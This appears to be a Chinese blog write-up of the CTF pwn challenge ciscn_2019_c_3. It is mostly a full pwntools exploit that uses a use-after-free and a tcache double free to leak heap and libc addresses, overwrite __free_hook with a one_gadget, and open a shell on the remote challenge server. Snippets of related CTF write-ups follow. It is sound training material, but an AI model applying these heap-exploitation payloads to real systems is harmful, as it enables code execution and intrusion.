ciscn_2019_c_3

最新推荐文章于 2025-01-07 15:39:14 发布
原创 最新推荐文章于 2025-01-07 15:39:14 发布 · 455 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf

本文详细解析了CISCN_2019_C_3挑战中的漏洞利用过程,通过后门函数修改文件描述符,最终实现对free_hook的覆盖,触发one_gadget获取shell。利用pwn工具包进行远程攻击,逐步介绍了heap和libc基地址泄露的方法。

思路

通过后门函数改fd然后tcache dump打到free_hook即可
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./ciscn_2019_c_3')
p=remote('node3.buuoj.cn',29374)
elf=ELF('./ciscn_2019_c_3')
libc=elf.libc

def add(size,name):
	p.sendlineafter('Command: ','1')
	p.sendlineafter('size: ',str(size))
	p.sendlineafter('name: ',name)

def show(idx):
	p.sendlineafter(': ','2')
	p.sendlineafter('index: ',str(idx))

def delete(idx):
	p.sendlineafter(': ','3')
	p.sendlineafter('weapon:',str(idx))

def backdoor(idx):
	p.sendlineafter(': ','666')
	p.sendlineafter(':',str(idx))

add(0x100,';sh')#0
add(0x100,'/bin/sh\x00')#1
add(0x100,'/bin/sh\x00')#2
add(0x100,'/bin/sh\x00')#3
delete(3)
delete(3)
show(3)
p.recvuntil('attack_times: ')
heap_base=int(p.recv(14))-0x590
log.success('heap_base: '+hex(heap_base))
for i in range(8):
	sleep(0.1)
	backdoor(3)
sleep(0.2)
add(0x100,p64(heap_base+4))#3
add(0x100,'\x02'*4)#6
add(0x100,'\x07'*(0x10+0x20)+'\x00'*0x34+p64(heap_base+0x20))#0x58
delete(0)
show(0)
p.recvuntil('attack_times: ')
libcbase=int(p.recv(15))-libc.sym['__malloc_hook']-88-0x10-8
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0x4f322
log.success('libcbase: '+hex(libcbase))
add(0x60,'\x00'*0x48+p64(free_hook-0x10))
add(0x60,p64(one_gadget))
show(0)
delete(2)
p.interactive()
[BUUCTF] ciscn_2019_c_3
zyxx_wjc的博客
04-13 2764
Ubuntu 18的堆题,需要考虑tcache机制。 checksec发现除了没有Full RELRO之外防护拉满,虽说只是Partial RELRO,但是因为开了PIE的缘故,不太好覆写got表(如果有大佬这样做的欢迎评论留言)。这里还是选择打free_hook 这题只能申请0x60,0x100,0x4f三种大小的内存,并且下标最大为8 del里面有个大洞,没有堆块指针清零,存在UAF。 有个backdoor,可以让attack_times这个字段增加,增加次数取决于下标,这个字段正好是fd指
ciscn_2019_c_1[BUUCTF]
moonlightsunshin的博客
05-03 1025
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
ciscn_2019_c_1
怪味巧克力的博客
07-18 670
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: from pwn import * from LibcSearcher import * content = 0 context(os='linux', arch='amd64', log_level='
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 992
通俗易懂
BUUCTF ciscn_2019_c_1
最新发布
2401_88087539的博客
01-07 371
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
ciscn_2019_n_3题目细说
Tw0的博客
02-04 294
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
ciscn_2019_n_4
doudoudedi
02-03 2055
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN2019 总决赛 Day2 Web1]Easyweb
qq_51684648的博客
03-23 4828
[CISCN2019 总决赛 Day2 Web1]Easyweb 1、打开页面,试了试,xml,sql注入都没试出来。 查看robots.txt文件,发现 再查看源码,发现了image.php,试一下 image.php.bak泄露 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id);
ciscn_2019_n_3 题解
lifanxin的博客
12-30 727
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
Buuctf Http
Dexret的博客
12-07 2537
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
2023最全CTF入门指南(强烈建议收藏)
Y525698136的博客
09-19 940
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。
准备搞一下CTF,有没有练习CTF的地方?
瓦罗兰特顶级C位的博客
03-07 489
CTF对新手,尤其是学生一族学习网络安全有非常大的帮助,今天就给大家推荐一些CTF练手的网站,都是不用花钱免费使用哦!
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 2455
[RoarCTF 2019]Easy Java
CTF竞赛介绍及刷题网址更新---2020.08
热门推荐
第七宇林的博客
08-15 1万+
CTF(夺旗赛) ---网络安全技术比赛的介绍 及 CTF常用的在线刷题网站:RedTigers-Hackit、XCTF(攻防世界)竞赛平台、网络信息安全攻防学习平台、OWASP 中国、实验吧CTF训练营、全国大学生信息安全竞赛官方网站、MS09067WEB靶场、合天网安实验室、封神台、SQL Fiddle、 BUUCTFCTFHUB...
5 个免费练习黑客技术的网站!
m0_59598029的博客
11-15 349
CTF(Capture The Flag)中文翻译就是夺旗比赛,这是网络安全领域技术人员之间进行技术竞技的一种比赛形式。比赛通过技术问题闯关形式,获取题目的Flag,从而获得分值。技术面涉及编程开发、程序逆向分析、破解、漏洞攻击、网络渗透、加解密等方面。CTF起源于1996年DEFCON全球黑客大会,发展至今,已经成为全球范围网络安全圈流行的竞赛形式。注意,CTF不是一个比赛的名字,而是一种比赛的形式。全世界每年都会展开非常多大大小小的CTF比赛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值